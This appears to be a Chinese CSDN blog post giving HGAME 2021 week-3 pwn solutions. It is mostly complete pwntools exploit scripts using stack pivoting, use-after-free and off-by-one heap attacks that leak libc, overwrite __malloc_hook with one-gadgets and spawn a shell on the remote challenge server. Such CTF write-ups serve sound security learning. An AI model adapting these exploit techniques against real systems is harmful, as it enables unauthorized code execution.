hgame2021 week3 pwn刷题

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量401 收藏 1
点赞数
分类专栏: hgame
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/113920914
版权

blackgive

栈迁移

from pwn import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
#p = process('./blackgive')
p  =remote('182.92.108.71',30459)
elf = ELF('./blackgive')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
temp = 0x6010A0
leave_ret = 0x4007A3
prdi = 0x400813
main = 0x40070A
#gdb.attach(p,'b *'+str(leave_ret))
password = 'paSsw0rd'.ljust(0x20,'\x00')+p64(temp+0xa0)+p64(leave_ret)
p.sendafter(':',password)
payload = '\x00'*0xa0+p64(0)+p64(prdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendafter('!\n',payload)
libcbase = u64(p.recv(6)+'\x00\x00') - libc.sym['puts']
system = libcbase + libc.sym['system']
one = libcbase + 0x4f3d5

pr('libcbase',libcbase)
password = '0'.ljust(0x20,'\x00')+p64(temp+0xa0)+p64(one)
p.sendafter(':',password)
p.interactive()

todolist

UAF glibc2.27

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30411)
#p = process('./todolist')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length):
	p.sendlineafter('exit\n','1')
	p.sendlineafter('write?\n',str(length))
def delete(idx):
	p.sendlineafter('exit\n','2')
	p.sendlineafter('?\n',str(idx))
def change(idx,length,ct):
	p.sendlineafter('exit\n','3')
	p.sendlineafter('?\n',str(idx))
	p.sendlineafter('write?\n',str(length))
	p.sendline(ct)
def show(idx):
	p.sendlineafter('exit\n','4')
	p.sendlineafter('check?\n',str(idx))
add(0x500)
add(0x10)
delete(0)
show(0)
leak = u64(p.recv(6)+'\x00'*2)
libcbase = leak - (0x7f3490493ca0-0x7f34900a8000)
realloc_hook = libcbase +libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
free_hook = libcbase + libc.sym['__free_hook']
one = libcbase + 0x10a41c
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
pr('realloc_hook',realloc_hook)
delete(1)
change(1,0x10,p64(malloc_hook-8))
add(0x10)
add(0x10)
change(3,16,p64(one)+p64(realloc_hook+6))
add(0x10)
#gdb.attach(p,'b *'+str(one))
p.interactive()

todolist2

glibc2.27 off-by-one

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30521)
#p = process('./todolist2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length):
	p.sendlineafter('exit\n','1')
	p.sendlineafter('write?\n',str(length))
def delete(idx):
	p.sendlineafter('exit\n','2')
	p.sendlineafter('?\n',str(idx))
def change(idx,length,ct):
	p.sendlineafter('exit\n','3')
	p.sendlineafter('?\n',str(idx))
	p.sendlineafter('write?\n',str(length))
	p.sendline(ct)
def show(idx):
	p.sendlineafter('exit\n','4')
	p.sendlineafter('check?\n',str(idx))
add(0x10) #0
change(0,-1,'\x00'*0x18+p64(0xd91))
add(0xff0) #1
add(0x10) #2
show(2)
libcbase = u64(p.recv(8)) - (0x7f2ada7b92a0-0x7f2ada3cd000)
realloc_hook = libcbase +libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
one = libcbase + onegadget[2]
pr('libcbase',libcbase)
add(0x10) #3
add(0x10) #4
delete(4)
change(3,-1,'\x00'*0x18+p64(0x21)+p64(malloc_hook-8))
add(0x10) #5
add(0x10) #6
change(6,-1,p64(one)+p64(realloc_hook+6))
add(0x20)
#gdb.attach(p)
#gdb.attach(p,'b *'+str(one))
p.interactive()

Library management System

off-by-one

远程才发现是glibc2.23

那就glibc2.23和glibc2.27都来一遍吧

glibc2.23

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30431)
#p = process('./library')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x45226,0x4527a,0xf0364,0xf1207]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length,ct='a\n'):
	p.sendlineafter('choice: ','1')
	p.sendlineafter('title: ',str(length))
	p.sendafter('title: ',ct)
def delete(idx):
	p.sendlineafter('choice: ','2')
	p.sendlineafter('id: ',str(idx))
def show(idx):
	p.sendlineafter('choice: ','3')
	p.sendlineafter('id: ',str(idx))
add(0x10) #0
add(0x20) #1
add(0x60) #2
add(0x10) #3
delete(0)
add(0x18,'a'*0x18+'\xa1') #0
delete(1)
add(0x20,'b'*8+'\n')#1
show(1)
p.recvuntil('b'*8)
libcbase = u64(p.recv(6)+'\x00\x00') - (0x7fe8a559fc08-0x7fe8a51db000)
realloc = libcbase + libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
one = libcbase + onegadget[1]
add(0x60) #4
add(0x60) #5
delete(2)
delete(5)
delete(4)
add(0x60,p64(malloc_hook-0x23)+'\n') #2
add(0x60)
add(0x60)
add(0x60,'\x00'*(0x13-8)+p64(one)+p64(realloc+12)+'\n')
p.sendlineafter('choice: ','1')
p.sendlineafter('title: ',str(0x10))
#gdb.attach(p)
#gdb.attach(p,'b *'+str(one))
p.interactive()

glibc2.27

from pwn import*
context.log_level = 'debug'
#p = remote('182.92.108.71',30431)
p = process('./library')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length,ct='a\n'):
	p.sendlineafter('choice: ','1')
	p.sendlineafter('title: ',str(length))
	p.sendafter('title: ',ct)
def delete(idx):
	p.sendlineafter('choice: ','2')
	p.sendlineafter('id: ',str(idx))
def show(idx):
	p.sendlineafter('choice: ','3')
	p.sendlineafter('id: ',str(idx))
add(0x10) #0
add(0x20) #1
add(0x30) #2
for i in range(10):
	add(0x70) #3~12
add(0x70) #13
delete(0)
add(0x18,'\x00'*0x18+'\x71') #0
delete(1)
add(0x60,'\x00'*0x28+p64(0x541)+'\n') #1
delete(2)
add(0x30,'b'*8+'\n') #2
show(2)
p.recvuntil('b'*8)
libcbase = u64(p.recv(6)+'\x00\x00') - (0x7fb7c99030e0-0x7fb7c9517000)
realloc = libcbase + libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
one = libcbase + onegadget[2]
delete(2)
delete(1)
add(0x60,'\x00'*0x28+p64(0x41)+p64(malloc_hook-8)+'\n') #1
add(0x30)
add(0x30,p64(one)+p64(realloc+6)+'\n')
#gdb.attach(p)
p.sendlineafter('choice: ','1')
p.sendlineafter('title: ',str(0x10))
#gdb.attach(p,'b *'+str(one))
p.interactive()
TTYflag
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
HGAME2021--RE题解
FIshy000的博客
03-29 1618
前言 hgame 2021的逆向部分题解,一道nc题和一道安卓逆向没有做,每周的题目都看了看,做了四分之三左右,杭电的比赛题目出得很有水平,自己学到了很多东西,wp本来说每周都写的,但是懒,比赛都结束一个月了才偷工减料得写出来。有兴趣的师傅凑合着看看吧吧???? RE-week1 一杯阿帕茶 明显的TEA加密标志,后面分析为XXTEA加密 加密后的数据,刚好35位 #include <stdint.h> #include <stdio.h> #define DELTA 0x9e
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1486
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 663
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 500
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
pwn 攻防世界刷题记录
m0_75234353的博客
05-19 175
运行就能getshell直接nc。
hgame2023 week3 writeup
02-03 1564
hgame2023 week3
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
hgame:Haskell 游戏引擎
05-30
3. **数据结构与算法**:游戏引擎中涉及到大量的数据处理,如碰撞检测、物理模拟、图形渲染等,都需要高效的数据结构和算法支持。Haskell的类型系统可以帮助开发者在编译时检查错误,避免运行时的问题。 4. **并发...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
3D模型图片查看器(可查看3D程序模型)
11-03
在游戏领域,尤其是Hgame(成人游戏)中,3D模型的创建和展示是至关重要的,因为它们构成了游戏内的角色和环境。 描述中提到的“Hgame图片模型查看工具”表明这个查看器可能专门针对游戏行业内,特别是成人游戏的3D...
pwn刷题小记
yzzob的博客
02-29 413
【代码】pwn刷题小记。
HGAME2021-week1-wp
qq_50438521的博客
02-07 5410
HGAME2021-week1-wp 1. Web_watermelon 链接:http://watermelon.ryen.xyz:800/ 本题是一个合成大西瓜的小游戏,过2000分拿到flag。 打开这个界面我人都是懵的,这是啥??下面的堆积的界面完全看不到,然后我就瞎子摸象,玩了不下五次,没有一次超过300分。真的!!!作为一个游戏黑洞,加上我从来没玩过它,让我不作弊是不可能的。 所以在火狐浏览器中找到web开发者,在查看器中更改界面,把红线提高,要让红线高就要让界面窄一点,深一点。 (如图所示)
hgame week3 kmusic(z3)
qq_54894802的博客
02-06 169
比较特别的z3求解,简单的.net逆向
buuctf——pwn刷题之旅(持续更新)
qq_42988973的博客
12-16 405
buuctf-pwn 的一些wp
pwn刷题num42---ret2libc(不容易)
tbsqigongzi的博客
05-02 1117
BUUCTF-PWN-pwn2_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 atoi会将一个字符串并转化为有符号整形(signed int),而我们只需要输入-1,即可绕过if(v2>32),使read函数读入非常大的数,造成栈溢出,查看一下程序,发
Hgame-Week3
qq_53086690的博客
03-03 617
目录WebLazyDogR4UPost to zuckonit200OK!!Liki的生日礼物 Web LazyDogR4U 地址:http://718a753f92.lazy.r4u.top 提示:懒狗R4u把Flag藏起来了,但由于他是懒狗,所以flag藏的很不安全。 进入页面之后是登录页面,用子域名爆破工具进行爆破。发现有www.zip. 下载之后分析源代码。发现有flag.php。分析代码得出 $_SESSION[‘username’] === 'admin’就会得到flag。 然后再lazy页
【wp】hgame2023 week3 Re&&Pwn
woodwhale的博客
02-01 818
hgame2023 week3 2个re和3个pwn的wp
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值